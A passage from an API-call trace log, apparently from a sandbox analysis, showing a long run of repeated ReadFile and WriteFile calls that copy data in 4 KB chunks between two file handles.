nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.930] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.930] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.931] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.931] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.931] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.931] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.931] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.931] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.931] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.931] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.932] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.932] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.932] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.932] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.932] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.932] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.933] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.933] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.933] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.933] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.933] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.933] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.933] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.933] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.934] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.934] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.934] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.934] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.934] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.934] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.934] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.934] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.935] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.935] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.935] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.935] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.935] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.935] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.935] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.935] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.936] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.936] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.936] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.936] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.936] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.936] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.936] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0102.937] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0102.937] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.020] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.020] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.020] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.021] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.021] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.042] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.042] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.042] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.042] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.043] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.043] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.043] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.043] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.043] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.043] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.043] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.043] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.044] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.044] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.044] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.044] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.044] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.044] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.044] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.044] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.045] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.045] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.045] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.045] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.045] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.045] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.045] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.045] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.046] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.046] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.046] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.046] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.046] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.046] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.047] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.047] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.047] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.047] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.048] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.048] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.048] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.048] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.048] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.048] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.048] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.048] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.049] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, 